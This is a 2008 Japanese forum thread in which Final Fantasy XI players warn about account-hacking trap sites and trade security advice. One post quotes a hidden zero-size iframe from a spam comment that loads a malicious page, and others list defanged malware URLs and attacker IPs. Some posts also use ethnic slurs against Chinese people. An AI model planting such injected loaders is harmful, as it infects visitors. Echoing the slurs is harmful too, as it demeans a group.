225 :既にその名前は使われています:2008/04/06(日) 00:07:28.46 ID:vrsV7xE0
886 名前:(・ω・)[sage] 投稿日:08/04/05(土) 17:51:42 ID:ycVUntkb
163data.com.cnさんが
ff11 移転 2008/4
ff11 2008 wiki
を検索しておられました。
FC2大手移転跡地の偽装とか気を付けよ…。


サイト主きをつけろよー

226 :既にその名前は使われています:2008/04/06(日) 00:24:19.96 ID:3qBGoRfe
mixiで何度も、業者らしい人から日記にコメントつけられた。
晒した方がいいのかな?
FF11dirにも参加していて一般人装っているが、
日記も公開して(書いてない?)ないし、マイミクも一人だけ。
俺が削除する間に他の人が踏むかもしれないから、本当に困るんだが。


227 :既にその名前は使われています:2008/04/06(日) 00:46:13.69 ID:tHke7fcB
4〜5日は大陸方面からのお客さんが多かったようです。
やっぱり週末を狙って動いてるんかのー。

228 :既にその名前は使われています:2008/04/06(日) 00:57:27.96 ID:/rMjoepG
武器防具スレッド Lv68〜
ttp://live27■2ch■net/test/read.cgi/ogame/1207410173/

ネ実にスレ立てまでしてる。
上のスレは1に垢ハックサイトへ誘導してる業者スレなんで踏むな。

229 :既にその名前は使われています:2008/04/06(日) 00:58:31.11 ID:bcbJTA7m
最近の業者は必死でなりふりかまわねーなー
まさに害虫

230 :既にその名前は使われています:2008/04/06(日) 01:04:41.55 ID:AYpunfVw
スレたてまでしてくるのか。こいつはうっかり踏んでしまいそうだな

231 :既にその名前は使われています:2008/04/06(日) 01:34:09.09 ID:wpXh+O2G
直接ネ実にスレ立てとか、いよいよシナチクも必死だな

232 :既にその名前は使われています:2008/04/06(日) 01:36:53.00 ID:tHke7fcB
今までにもいくつか立ててるじゃない。

233 :既にその名前は使われています:2008/04/06(日) 01:38:38.95 ID:TMWLCPJd
死ねよクソ業者

234 :既にその名前は使われています:2008/04/06(日) 02:41:50.85 ID:zipBhQsS
寝る前保守上げ

235 :既にその名前は使われています:2008/04/06(日) 03:24:41.39 ID:eGCKrdnP
風呂に入りながら保守

236 :既にその名前は使われています:2008/04/06(日) 05:05:06.55 ID:dK36QmGl
寝る前に保守ー
もう朝だー
あーたーらしーいーあーさがきった

237 :既にその名前は使われています:2008/04/06(日) 05:08:49.72 ID:DTrLpAzY
小康状態?
それとも乱立したハックスレのおかげで認知度上がり被害が減ったのかな
だといいけど。

238 :既にその名前は使われています:2008/04/06(日) 07:07:15.31 ID:N0yli94u
FC2のアクセス禁止設定に163data.com.cnを入れたらはじけないだろうか?

239 :既にその名前は使われています:2008/04/06(日) 07:34:22.96 ID:lk912rGZ
あげですにゃ

240 :既にその名前は使われています:2008/04/06(日) 07:55:03.62 ID:hmOesEhc
人肌ですにゃ

241 :既にその名前は使われています:2008/04/06(日) 09:24:53.87 ID:BC2OxdIu
日本語や英語できる連中が仲間におるからこれから先も巧妙になるだろな。

242 :既にその名前は使われています:2008/04/06(日) 10:25:37.40 ID:tHke7fcB
>>228のスレは削除された。
申請した人&削除人乙。
どっこいしょage

243 :既にその名前は使われています:2008/04/06(日) 12:11:52.34 ID:eGCKrdnP
200まで落ちたあげ
今週は静かでいいね

244 :既にその名前は使われています:2008/04/06(日) 13:30:57.67 ID:zFBFwMAX
保守

245 :既にその名前は使われています:2008/04/06(日) 13:54:34.93 ID:A0AXtnku
2117966と似たような(あれよりは小規模な)script注入。
ttp://blog.trendmicro.com/massive-iframe-attacks-continue/
見慣れたファイル名群、やっぱり暗黒工作組(CuteQQ)のツールでした。
www■nmidahena■com
→www■nmidahena■com/test.exe

246 :既にその名前は使われています:2008/04/06(日) 13:56:09.74 ID:f3CzFpyf
また暗黒か

247 :既にその名前は使われています:2008/04/06(日) 15:04:40.31 ID:n75Q0eby
ヴァナモンブログのURLぐぐったら、このサイトはコンピュータに損害を与える可能性があります
と出たんだが、これはまたやられたの?
それとも一度やられると消えないの?

248 :既にその名前は使われています:2008/04/06(日) 15:13:40.41 ID:A0AXtnku
>>247
一度やられて登録されると
ttp://www.stopbadware.org/
に釈明しない限りそのままじゃないかな。

249 :既にその名前は使われています:2008/04/06(日) 15:49:44.82 ID:n75Q0eby
>>248
そうなんだ、どうもありがとうございました

250 :26:2008/04/06(日) 16:28:55.84 ID:MahiwG8j
あまり暇がなくてお礼をいえなくて申し訳ありません

LSコミュのほうを使用しているのですがそちらを手動入力にしていればハックされる可能性は下がるのでしょうか?

>>27>>28>>29
速レスありがとうございます。

251 :既にその名前は使われています:2008/04/06(日) 17:21:50.15 ID:Sik7Tb8W
犯罪者の換金窓口RMTへようこそ^^

252 :既にその名前は使われています:2008/04/06(日) 17:36:12.83 ID:xVN6TKF5
>>250
LSコミュを使ってるならWin版と同じくらい危険だから、
PC使いのプレイヤーと同じくらいセキュリティに気を使う必要があるよー。

パスを保存せずに手入力してるという件については、まずFF自体からパスを盗む
ウイルスは大抵キーロガーもセットになってるから手入力でも安全ではないし、
LSコミュでも「ネカフェからLSコミュを利用してその後ハックされた」っていう事例が
あったと思うから、保存せずに毎回手入力していてもPC自体がウイルス感染していたら
アウトだと思われる。
PCのセキュリティをしっかりしておくことは当たり前として、それでも不安ならば
LSコミュを使用した後はPS2でPOLにログインしてパスを変えておくと安心だと思う。

253 :既にその名前は使われています:2008/04/06(日) 17:36:40.05 ID:p86y1AS7
LSコミュは罠

254 :既にその名前は使われています:2008/04/06(日) 17:55:41.68 ID:4ITqy9oB
スンヂは業者と仲良し、てか氏ねじゃなくて死ね

255 :既にその名前は使われています:2008/04/06(日) 18:04:02.98 ID:/uLqs8kU
で公式の救済内容の方針だすのまだ?
すぐ流れるトピックスから
一週間以上たってますけどスクエニさん。

256 :既にその名前は使われています:2008/04/06(日) 18:13:55.52 ID:xVN6TKF5
>>255
鯖の不調はともかく(それも駄目だけど)、LSコミュ関係の障害・復旧はもう
別の場所で表示しろって思う。例のアカウントハッキングにご注意のやつなんて
一日もせずにインフォメーションのトップから流されたしな

257 :既にその名前は使われています:2008/04/06(日) 18:14:13.53 ID:MahiwG8j
>>252
ありがとうございます
ちょっと纏めサイトでも探してセキュリティ見直してきます

258 :既にその名前は使われています:2008/04/06(日) 18:18:44.79 ID:jZva0fsL
まとめサイト探すのもあぶねぇんじゃねぇか?

259 :既にその名前は使われています:2008/04/06(日) 18:22:02.72 ID:MahiwG8j
>>258
え、そんな危険なんですか?
なんかavast!じゃウィルス透過するみたいなことが書いてあった気がして気になってました

260 :既にその名前は使われています:2008/04/06(日) 18:29:42.01 ID:xVN6TKF5
>>259
とりあえず>>1にある三つはどれも大丈夫だとおもう。ただし人に勧められても
踏むのは自己責任で頼む。
パス手入力ならば感染=即盗まれる ってわけじゃないから一応罠を踏んでも
即死するわけじゃない。盗まれるのはパスを入力してるときだからね。
怖いならPS2でパスかえておきな。

261 :既にその名前は使われています:2008/04/06(日) 18:32:54.04 ID:MahiwG8j
>>260
ありがとうございます
いろいろ対策を講じておこうと思います

262 :既にその名前は使われています:2008/04/06(日) 19:22:25.01 ID:EvKl1wus
知り合いが、どうやらBANされたやうだ。
毎日、何かのコンテンツに行っていたのに
3月20日前後からインしてない。

垢ハックか、RMTしてBANか・・・

263 :既にその名前は使われています:2008/04/06(日) 19:28:58.53 ID:QJkKFWBl
>>262
BANか垢ハックしか想定してもらえないそいつが可哀想だなw

264 :既にその名前は使われています:2008/04/06(日) 19:30:11.13 ID:xVN6TKF5
>>262
時期が時期だから引退した可能性だって考えてやれよw

265 :既にその名前は使われています:2008/04/06(日) 19:41:51.57 ID:EvKl1wus
>>263-264
そうなんだけど
「また明日」って落ちたからなあw

266 :既にその名前は使われています:2008/04/06(日) 20:54:31.64 ID:rtTG+qxY
それ普通、病気とか事故じゃないかと心配しないか?w

267 :既にその名前は使われています:2008/04/06(日) 21:03:00.29 ID:p4IMLGKP
>>255
わだw>なに言ってるの?そんなの株主対策に決まってるじゃないwwwこの時期で発表すれば後は「今相談中です」で少なくとも半年は金使わなくて済むじゃん?
わだw>それよりも、FF13の事聞いてよ〜PS3乗り切れそうになったから、今度発売日を来年ぐらいって言えるようになったんだから〜これとドラクエで後10年は引っ張れるな〜

268 :既にその名前は使われています:2008/04/06(日) 21:43:21.84 ID:R5tg+LG3
なんかカスペでスキャンしようとしたら
スキャンボタン押したら出てくる窓が文字化けしてるんだが俺だけ?
何度やっても文字化け。
説明が下手ですまない…
何か今日FFやってて妙に落とされたんで、
感染→カスペでスキャンさせないように文字化けさせてる
とか疑心暗鬼になっちゃって…
誰かカスペで問題なく(文字化けとか出ず)スキャン出来るか試してもらえませんか?
ちなみに何かホスト規制くらってるので携帯から失礼してますorz

269 :既にその名前は使われています:2008/04/06(日) 21:51:29.39 ID:xVN6TKF5
>>268
Fx使ってない?カスペは確かFxではスキャンできないから変になるとおもう。
もしくはエンコードの問題。IEならツールバーの「表示」>エンコード、Fxなら表示>文字エンコーディングで
Unicode(UTF-8)選んでみ

270 :既にその名前は使われています:2008/04/06(日) 22:00:11.77 ID:R5tg+LG3
268です。
Fx…はどうかわかりませんがエンコードは大丈夫でした。
カスペは普段からよく使っていて、
普段、というか今日の昼までは問題なく出来たのに…あぁ胃が痛い

271 :既にその名前は使われています:2008/04/06(日) 22:14:54.27 ID:xVN6TKF5
>>270
ttp://tune.ache-bang.com/~vg/outitem/up/img/19249.jpg
↑はウィンドウ全体、jpg見るのが怖かったり携帯からしか見れないなら一部分を切り取った↓のを見てくれ
ttp://imepita.jp/20080406/798060
こういう文字化けではない?
もしエンコード以外で本当に原因不明の文字化けしてるならバスターのオンラインスキャンあたりで
調べてこないとだよ

272 :既にその名前は使われています:2008/04/06(日) 23:06:38.96 ID:2/2qIY+4
俺の友達からやられたってメールが来た。

装備は全部売られてキャラは解約されてたとのこと。

これクラカ登録してたらやばいんだよね?
友達に教えてやらにゃ・・・・。

273 :272:2008/04/06(日) 23:07:13.12 ID:2/2qIY+4
クラカ→クレカ

274 :既にその名前は使われています:2008/04/06(日) 23:35:38.39 ID:022tXita
>>272
          .,Å、
        .r-‐i'''''''''''i''''‐-、
       o| o! .o  i o !o
      .|\__|`‐´`‐/|__/|
       |_, ─''''''''''''─ ,、 / _
     /              \
    /    /            i
    |      ● (__人_) ●   | キングカワイソス・・・
    !                   ノ
    丶_              ノ


275 :既にその名前は使われています:2008/04/06(日) 23:36:13.04 ID:xVN6TKF5
>>272
それは今週の話?今週は沈静化してるかと思って少し安心してたのにやっぱり駄目かー
いったんハックされてしまった以上クレカはやめてもらったほうがいいだろうね

276 :既にその名前は使われています:2008/04/06(日) 23:56:07.16 ID:iH6KCCtl
POLからクレカの番号見えないでしょ?
何がやばいの?

277 :既にその名前は使われています:2008/04/07(月) 00:00:19.74 ID:SpXsR4rb
どういう手段でPOLパス&ID抜かれたか分からないから、そのPCでやった何もかもが危ないな。
POLからクレカの番号本当に見えないのかは知らないがナー

278 :既にその名前は使われています:2008/04/07(月) 00:40:00.23 ID:TB4FF1z5
どこのサイトでもたいていそうだがPOLもクレカ情報は末尾4桁の数字のみ表示

279 :既にその名前は使われています:2008/04/07(月) 00:46:16.65 ID:1S2/1JUn
ただしクレカは登録してあればFFのコンテンツで好きに使えるから、
1キャラしか持っていない人の場合、「15キャラ作られる+鯖移動される」で5000円近く
不正に利用されてしまう可能性がある。
キャラ作成の方は多分例が無いが、鯖移動の方は他鯖の業者キャラに金品を渡すために
頻繁にやられているようだ。
もしかしたらPOL内の別のコンテンツでの課金にも使えるかもな

280 :既にその名前は使われています:2008/04/07(月) 01:04:09.82 ID:Nz86ZsU9
>>272
>キャラは解約されてたとのこと
今までの報告だとすっぱにされてどっかで寂しくたってるってのがおおくて
解約されてたってのはあまり見たことがないような気がする。
なので よかったらフレさんの状況を>>11テンプレでお願いできないだろうか。
原因とかわかる部分があるならよかったらソレも。

281 :既にその名前は使われています:2008/04/07(月) 02:31:48.24 ID:PiBnEyPM
私もずっとスレ見てるけど、解約は見た事ないと思う。

別のケースで、被害にあってサポセン閉まってるからGMにアカを一時停止してもらって、
後日復帰申請したら別の人から申請きてるってのを何処かのblogコメントで見た。

更に手が込んできたなぁ・・・。

282 :既にその名前は使われています:2008/04/07(月) 03:29:15.01 ID:SPWgPIp5
寝ながら保守上げ

283 :既にその名前は使われています:2008/04/07(月) 04:06:20.73 ID:CSgDmzdl
酷い話だな…解約て…
更に自分でやってもない鯖移動の代金もか

284 :既にその名前は使われています:2008/04/07(月) 04:40:25.50 ID:NmeqPJZZ
被害報告が減ってるが、やはり被害者は増える一方だが対処も何もなしか
解約したのはハックした形跡を残さない為だと思うが、それにしても酷いな

恐らく業者もこのスレを見てて、サポセンの対応などを把握してるんだろう
それでGMコールをされる前に自分達でする、と言う事もやってるんだろうな

本気でPOLのシステムを何とかしないと、これは自衛だけでは対策できなくなるよ

285 :既にその名前は使われています:2008/04/07(月) 05:00:53.52 ID:NmeqPJZZ
そういや俺、単発IDで張られたアドは他の板でも踏まないようにしてるよ
特にアダルト板なんて、別の意味で業者が多いから即NG処理

286 :272:2008/04/07(月) 05:31:31.01 ID:JW26jKxJ
やられたのは先月のよう。
友達は先月頭から忙しくて月末久々にプレイして気づいたみたいです。
昨日メールで私のところに下記報告があっただけなので状況がなんとも・・・。
>装備全部売られてキャラは解約されてて、サポセンに電話したらとりあえず警察に行けと言われた。

どうも今はネット環境の乏しいところにいるらしく後2週間は家に帰れないみたい。

287 :既にその名前は使われています:2008/04/07(月) 05:43:34.05 ID:S6NSQpUc
垢ハックの初期に鯖移動・削除って報告あったから所期の手口かもね。

垢ハックは■が無能で根性無しだからリスク無いが、鯖移動は信販会社だとわりと
イケイケのトコあるからリスク高い。

288 :既にその名前は使われています:2008/04/07(月) 06:09:00.99 ID:535jSuuF
いろいろあるけどやっぱPC再点検でしょ。元栓絶たないと。
カスペの世話になる前にWindows UpdateとRealPlayerのアンインスコ。
OSの再インスコの方が確実かなー。

289 :既にその名前は使われています:2008/04/07(月) 06:53:43.65 ID:+sh9p2l1
  / ̄ ̄ ̄ /  /''7 ./''7        / ̄/  /''7
 ./ ./ ̄/ /  /__/ / /  ____    ̄  / /
 'ー' _/ /   ___ノ /  /____/   ___ノ /
   /___ノ   /____,./         /____,./

   _ノ ̄/ / ̄/  /''7 / ̄ ̄ ̄/   / ̄/             /'''7'''7
/ ̄  /    ̄  / /    ̄ フ ./   /  ゙ー-;   ____   / / /._
 ̄/ /     ___ノ /   __/  (___  /  /ー--'゙ /____/ _ノ /i  i/ ./
 /__/   /____,./   /___,.ノゝ_/ /_/           /__,/ ゝ、__/

290 :既にその名前は使われています:2008/04/07(月) 08:18:16.95 ID:GQoIBTuC
出社完了上げ

291 :既にその名前は使われています:2008/04/07(月) 09:01:21.69 ID:mm0MSu1H
>268
カスペルスキー オンラインスキャンの窓のほうがおかしいらしい
セキュリティ板のほうでもでてるが、誰がつないでも今現在文字化けするようだ

292 :既にその名前は使われています:2008/04/07(月) 09:58:35.05 ID:KvevYsbR
アイテム、ギル売られて、キャラ削除と解約のコンボ喰らったら
さすがにそのまま泣き寝入りしそうだ。■eは、早急に救済策出せよ。


293 :既にその名前は使われています:2008/04/07(月) 10:59:42.26 ID:j+srmcwK
>>286
FFはクレカ登録してても、鯖移転費用3000円ぐらいの実質被害しか出ないよ
上で紹介されてるのは、登録クレカでゲーム内マネーを買うアイテム課金系ゲームの話

294 :既にその名前は使われています:2008/04/07(月) 11:07:05.18 ID:oFV8SxQY
カスペルスキーのオンラインスキャンでウイルス1つ検出されたんだけど、レポート見てもウイルス名が見れないから
体験版インストールしてフルスキャンしてもウイルスが検出されなかった…

295 :294:2008/04/07(月) 11:07:26.98 ID:oFV8SxQY
ごめん、変な日本語になったorz

296 :既にその名前は使われています:2008/04/07(月) 11:27:20.63 ID:iLcB6Uq+
IE7からOperaにブラウザを換えたのですがお勧めの設定はありますか?
インラインフレームはホームページやブログ毎に個別に「表示しない」を設定していくしかないのでしょうか?

これまではIE7でインラインフレームを無効にしていました。
その他の状態は
カスペ・PG2使用
RealPlayerアンインストール
Windows Updateは常に最新

何卒よろしくお願いします。

297 :既にその名前は使われています:2008/04/07(月) 12:39:31.89 ID:gC9tzAvp
>>296
iframeの必須なサイトは殆ど無いので(もしくは非表示でも問題ない事が多い)
自分はいちいち設定しないで通常はオフ、必要な時だけ手動で切り替えてます
(設定→詳細設定→コンテンツ→スタイルオプション)
慣れればたいした手間にはならないですよ。

それから、外観のツールバーの設定からカスタマイズすると
(カスタマイズのやり方は、最初は分かり辛いかもしれませんが専用サイト等で調べてみてください)
ブラウザのツールーバー上から直接、javaスクリプト、Cookie等の表示非表示の切り替え出来るのでお勧めです。
(通常はオフで、必要に応じてワンボタンでオンオフの切り替えが簡単に出来ます)

あと、詳細設定のセキュリティのフィッシング機能を有効にするをチェックで。

298 :296:2008/04/07(月) 13:31:30.28 ID:iLcB6Uq+
>297さん
丁寧な回答ありがとうございました。
帰宅したら設定を変更してみます。

299 :既にその名前は使われています:2008/04/07(月) 15:59:31.27 ID:v+XdmvAK
ageついでに

車のポータルサイトcarview.co.jpでも不正アクセスがあった模様
http://www.carview.co.jp/company_info/information.asp

300 :既にその名前は使われています:2008/04/07(月) 16:44:43.67 ID:LsP0j2fc
ちょっと前に知り合いの外人もやられた模様。人種は問わないみたい。

最近沈静化してるけど新しいプログラム組んでるかもしれんから
要注意だな。

301 :既にその名前は使われています:2008/04/07(月) 18:06:35.59 ID:4YYRi4SR
現在211 サルベージ

302 :既にその名前は使われています:2008/04/07(月) 19:21:15.49 ID:j42vYdCB
保守

303 :既にその名前は使われています:2008/04/07(月) 19:40:12.19 ID:WZ1STGg/
質問。フレのブログで
いかにもなアドレスが張られてたんだけど
これってクロですか?

p://blog20fc2.com/ff11/modules/

うっかり踏まないようhttを消してあります
検証できる人お願いします・・・

304 :既にその名前は使われています:2008/04/07(月) 19:43:33.37 ID:cxA6QnQf
>>303
中華の罠、既出。
こういうのはここに書く前に一度ググってみな。
”blog20fc2 危険”でも判ることだし。

305 :既にその名前は使われています:2008/04/07(月) 19:44:26.99 ID:Ponsvw8A
ぁぅぁぅ
ブラウザ攻撃 (2)

http://www.siteadvisor.com/sites/blog20fc2.com


306 :既にその名前は使われています:2008/04/07(月) 19:46:24.03 ID:z0+XrY53
>>303
www.infosueek.com/ff11diary/
とかいう明らかにあれなサイトがiframeで開くように指定されてる

307 :既にその名前は使われています:2008/04/07(月) 19:56:03.87 ID:WZ1STGg/
なるほど〜
blog20fc2=垢ハックサイト、と思っていいんですね
ありがとうございました

308 :既にその名前は使われています:2008/04/07(月) 21:06:19.27 ID:BQJfvC7R
>>307
少し勘違いしてるようだが・・・
まあ危険なのは分かってくれたみたいだからいいか。

309 :既にその名前は使われています:2008/04/07(月) 21:09:35.41 ID:RRPx8a4X
ハックハックこんにちは

310 :既にその名前は使われています:2008/04/07(月) 21:17:16.37 ID:24mgbbcr
ちょっとPCつけっぱで今家に帰ってきたらpeergardianが反応して中国へのアクセスブロックしてるんだが
これってやばいかな?

311 :既にその名前は使われています:2008/04/07(月) 21:18:37.41 ID:Ho2UpzhO
情報不足

312 :既にその名前は使われています:2008/04/07(月) 21:19:27.70 ID:z0+XrY53
これはエスパー検定B級以上を要する質問だな

313 :既にその名前は使われています:2008/04/07(月) 21:20:16.13 ID:h+B+YI34
中国製のソフトやら使ってればアップデートではじくわな。

あとSkype入れてないか? アレ入れるとめちゃくちゃはじく。

314 :既にその名前は使われています:2008/04/07(月) 21:24:59.56 ID:24mgbbcr
エスパー呼んで申し訳ない(´・ω・`)

avast+Spybot+Peergardian(中国台湾IP拒否設定)+ZonealarmのPCを使って居るんだが
昨日寝落ちするまでweb巡回→朝PC落とすのめんどくさいのでつけたまま放置してたんよ(´・ω・`)
んで、家に帰ってきてPeerGardianのログみたら中国へのアクセス拒否のログ並んでいたわけなんだ。
これはふつーにポートスキャンで回ってきた奴って見なして良いのかな?


っていうこと


315 :既にその名前は使われています:2008/04/07(月) 21:48:24.66 ID:ZANkWT8w
それを他人が判断できると思ってんのか?

316 :既にその名前は使われています:2008/04/07(月) 22:27:32.93 ID:L72JBqPF
中華に送信ならもうアウトとおもえww
普通な奴は韓国、香港でブロックだからなw



317 :既にその名前は使われています:2008/04/07(月) 23:37:56.31 ID:Ponsvw8A
PG2は外からの通信は弾かんだろ?
ウイルスやトロイに感染して、バックドアプログラムが内部から外へ情報を
送信しようとしたんじゃないか?

PG2が防いでくれてよかったなw

318 :既にその名前は使われています:2008/04/07(月) 23:44:19.97 ID:JBfYCx+n
>>314
一日中立ち上げてると自分→拒否リストIP宛と拒否リストIP→自分への接続を拒否してるログが相当ある
恐らく何かしらの接続を試してるだけだから気にスンナ そこに載ってるってことは拒否してくれてるんだから。
それよりもカスペ試用してみてフルスキャンしてみたら?

319 :既にその名前は使われています:2008/04/07(月) 23:49:54.81 ID:PbUNmfak
似たようなスレだから、こっちにも貼っておこう。



友達に進められて「リネ1」を無料期間やってみたんだが……
FFXIとか比じゃないくらい業者がすごくて笑ったよwwwwww

ttp://www.imgup.org/iup589451.jpg
ttp://www.imgup.org/iup589453.jpg
ttp://www.imgup.org/iup589455.jpg

↑ ペット販売業者? っていうのかな。
売れ筋のペット(キツネ)を連れてBOTが10匹くらいイナゴのように食い漁ってる。

お金しか拾わないから、ドロップアイテムが大量にばら撒かれて、カオスエリアと化してる。
キャラ名も「kashfrsi1213」とか意味不明な文字列だし。


ネトゲ末期って怖いな。

320 :既にその名前は使われています:2008/04/08(火) 00:29:08.62 ID:e0wQojEw
>>319
正体が分からない人間からすると蛆虫みたいに見えるんだが・・・w

321 :既にその名前は使われています:2008/04/08(火) 00:36:48.15 ID:WgppQbJc
>>319
グロ貼るな

322 :既にその名前は使われています:2008/04/08(火) 00:39:07.38 ID:WgppQbJc
photoIIは業者にURL貼られまくって大分勢い落ちたな
管理人が対応迫られて突っぱねてたしもう駄目ぽ

323 :既にその名前は使われています:2008/04/08(火) 01:41:38.37 ID:0R5ZcN6/
208 サルベージ

324 :既にその名前は使われています:2008/04/08(火) 03:10:51.83 ID:e0wQojEw
193寝る前保守
200越えたら上げといてくれー

325 :既にその名前は使われています:2008/04/08(火) 06:05:50.48 ID:cXu8mGrV
>>310
P2Pブロックしてるけど、アップデータ確認するとエラーでまくってなかなか更新できない
で、その間ChinaのIPブロック履歴がズラーっと流れてく。同じかな?
調べたら、PlanetLab Node: thu2.6planetlab.edu.cnだった。
サーチとか書いてあるけど・・・これは何だろう

326 :既にその名前は使われています:2008/04/08(火) 06:32:08.34 ID:KTuYBPZh
>>314
送信元が中国のIPだったら、ポートスキャンの可能性もあるけど、
送信元が自PCのIPだったら、トロイとかかもしれん。

>>317
>PG2は外からの通信は弾かんだろ?
弾く。
他のPCからping送ってみれば、すぐ確認できるよ。

327 :既にその名前は使われています:2008/04/08(火) 06:56:16.97 ID:1IivaVO9
>>325
PlanetLab自体は各大学やインテルが主体で研究している、仮想ネットlabだけど
なんでそんなんが325氏のPCに入ってるんだ?
学生さんかな?

328 :既にその名前は使われています:2008/04/08(火) 06:58:07.58 ID:KTuYBPZh
>>318
>一日中立ち上げてると自分→拒否リストIP宛と拒否リストIP→自分への接続を拒否してるログが相当ある
うちは、何もしてない状態で「自分→拒否リスト」は、全くないな。
aguseとかで、どこにアクセスしてくかぐらいは、確認したほうがいいんじゃない?
できれば、どのアプリが原因かも調べたほうがいいと思う。

329 :既にその名前は使われています:2008/04/08(火) 07:01:37.42 ID:cXu8mGrV
>>327
いいえ、二十代のしがない販売員です><ってなんでそんなラボがアクセスしてくるんだ・・・
まったく心当たりが浮かばない・・・モンスタファームオンラインは違うだろうし

330 :既にその名前は使われています:2008/04/08(火) 08:51:26.14 ID:zRcnIu9x
原因がわからない・判別不可能な動作をしている・気持ち悪い
この三つ揃ってたら精神衛生上にもクリーンインスコがいいんじゃないか?

331 :既にその名前は使われています:2008/04/08(火) 10:06:15.67 ID:l/o0hVYx
とりあえずプロセスと使用ポートのログ取って放置してみるは
後でPGのログと比較する

332 :318:2008/04/08(火) 10:06:59.25 ID:l/o0hVYx
ID変わってたすまそ

333 :既にその名前は使われています:2008/04/08(火) 10:32:18.86 ID:oPrb1Doa
ブラウザハイジャッカーをインスコされたんじゃね?
あれに感染するとIE起動時に立ち上がって、見に行ったサイト情報や入力フォームの内容とか
個人情報をハッカーの鯖に送り続けるらしい

試しにFirefox起動して同じ現象起きるか確認してみ

334 :既にその名前は使われています:2008/04/08(火) 10:37:10.22 ID:0R5ZcN6/
203 サルベージ

335 :既にその名前は使われています:2008/04/08(火) 12:31:09.14 ID:SC0W5LqQ
保守

336 :既にその名前は使われています:2008/04/08(火) 14:08:21.23 ID:2bmMR/lc
age

337 :既にその名前は使われています:2008/04/08(火) 14:10:01.06 ID:TGhPsigM
顧客情報10万人分流出か
カード不正利用の可能性

 千葉県成田市の音響機器販売会社「サウンドハウス」は7日までに、同社が運営する通信販売サイトに海外を経由した
不正アクセスがあり、顧客情報が最大で約10万人分盗まれた疑いがあると発表した。

 複数のクレジットカード会社が3月21日、同社に対して顧客情報が不正利用されている可能性があると指摘して発覚。
同社は千葉県警に被害届を提出し、詳しい流出原因を調べている。

 サウンドハウスによると、昨年1月1日から今年3月22日までに通販サイトに会員登録した顧客の情報で、名前や
生年月日のほか、クレジットカード番号なども含まれていたという。
 調査の結果、今年3月中旬に中国を経由して通販サイトに不正アクセスがあったのが確認された。同社の中島尚彦社長は
「情報流出に伴う不正利用で顧客への負担は一切発生しないように対策を講じる」としている。(共同通信)

京都新聞
http://www.kyoto-np.co.jp/article.php?mid=P2008040700179&genre=C4&area=Z10

個人情報の流出について
http://www.soundhouse.co.jp/

338 :既にその名前は使われています:2008/04/08(火) 15:09:15.55 ID:SC0W5LqQ
保守

339 :既にその名前は使われています:2008/04/08(火) 16:53:21.03 ID:sErbB6yH
コメントに危険URL貼られたのでさらしあげ。
FF関係ない、まんがイラストサイトなんだけどなあ@ライブドア

-----

こんにちは^^
Unicorn鯖で遊んでるCherokee(???)です。
?????に???x2遊びにきますね?
お気に入り登録させていただきました〜(^?ω★^)ノ????

まりぶぅ
xxp://www■gamtyblog■net/web/

-----

ちなみにソース
<iframe src="hxxp://www■caremoon■net/web/main■htm" width="0" height="0" frameborder="0"></iframe>
だとよ。
文字化けしてるのはやっぱりチャイナだからか?

340 :339:2008/04/08(火) 16:56:36.37 ID:sErbB6yH
追加 
やつのIP 203.143.111.12

341 :既にその名前は使われています:2008/04/08(火) 17:19:40.23 ID:Rv4lF+5a
>>340
そのIPはどうも串っぽい
Contact Information: [公開連絡窓口]
[名前] 株式会社インターリンク
[Name] INTERLINK CO.,LTD.
[Email] nic@interlink.ad.jp

そこにゴルァメールを送ればおk
単にウィルスコメント書き込まれたぞゴルァじゃなくて、
ちゃんと細かく書いておかないとダメだぜ

ついでにライブドアも中華の橋頭堡だから注意してくれよな!
ブログにはIFRAMEが仕込めたり、Wikiでは無数に取得したIDやら本拠地から改竄を繰り返すわ
ちなみにライブドアの利用規約には”禁止行為に関する罰則が無い”、つまり中華はやりたい放題と言うわけだ

342 :既にその名前は使われています:2008/04/08(火) 18:39:36.54 ID:p3hGUhXb
200あげあげ

343 :既にその名前は使われています:2008/04/08(火) 18:47:48.18 ID:NTAmrpbo
かすぺがApanic.netを遮断するんだが
ここ問題あるサイトか?

344 :既にその名前は使われています:2008/04/08(火) 19:30:26.49 ID:ErhTjVZt
保守ついでに
>339
China Chengdu
221●10●254●63


345 :既にその名前は使われています:2008/04/08(火) 19:32:41.30 ID:58B2c/qm
サウンドハウスって成田なのかすげぇ近い
まぁどうでもいいですが保守

346 :既にその名前は使われています:2008/04/08(火) 19:43:05.81 ID:k+pc0KKe
>>341
インターリンクはスパムとかで文句送っても全く対応しないことで有名

347 :既にその名前は使われています:2008/04/08(火) 20:00:51.33 ID:6+CqkC4u
カービュー サイト改竄@リネージュ資料室
ttp://lineage.paix.jp/guide/security/virus-site.html#CARVIEW

>2008年4月上旬、自動車総合サイトの「カービュー (carview.co.jp)」が不正アクセスにより改竄され、ウィルスが埋め込まれました。
>埋め込まれたのは fjp.js という名前のJavaScriptで、オンラインゲームのアカウント情報を盗むウィルスのインストールを試みます。
>カービューのお知らせではウィルス対策ソフトでのチェックを勧めていますが、 4月7日時点ではシマンテック、トレンドマイクロ、
>マカフィー、NOD32、avast!、 AVGのいずれでも検出できませんでした。
>心当たりの方は、カスペルスキーのオンラインスキャンの利用をお勧めします。



348 :既にその名前は使われています:2008/04/08(火) 20:47:12.19 ID:H4N1SG0v
手が込んできてるなぁ。

349 :既にその名前は使われています:2008/04/08(火) 21:00:04.93 ID:eFdxEnMF
>>347
うへ、よく見てたサイトだ…。
>4月6日14時30分〜16時頃にcarview.co.jpのページを閲覧したユーザーに対して、
>ウイルス対策ソフトなどによる確認を行なうよう呼びかけている。

出かけてた時間でヨカッター、どのサイトも安心できないな。

350 :既にその名前は使われています:2008/04/08(火) 21:02:05.48 ID:0R5ZcN6/
クリエイティブメディアのサイト改竄、原因はSQLインジェクション
http://internet.watch.impress.co.jp/cda/news/2008/04/08/19133.html

351 :既にその名前は使われています:2008/04/08(火) 21:07:59.78 ID:KZ+y4l9y
犯罪者国家がオリンピック開催国なんだよな〜
どうなる事やらw

352 :既にその名前は使われています:2008/04/08(火) 21:25:38.17 ID:AtKccGs6
ttp://www.woshijianren.com/Florian/

これは何の垢をハックするの?


353 :既にその名前は使われています:2008/04/08(火) 21:30:52.38 ID:iOLmjZEp
ここまできたら中国をインターネットから遮断すべきだな、害虫だわmjd

354 :既にその名前は使われています:2008/04/08(火) 21:31:12.33 ID:zMdBLvG1
ここでオススメのカスペとPG2に乗り換えたんだが
一日一回ぐらいWin版の全画面解除エラーで落とされるんだ。

通知は全部OFFにして小窓も出ない設定にしてるのになぁ…。
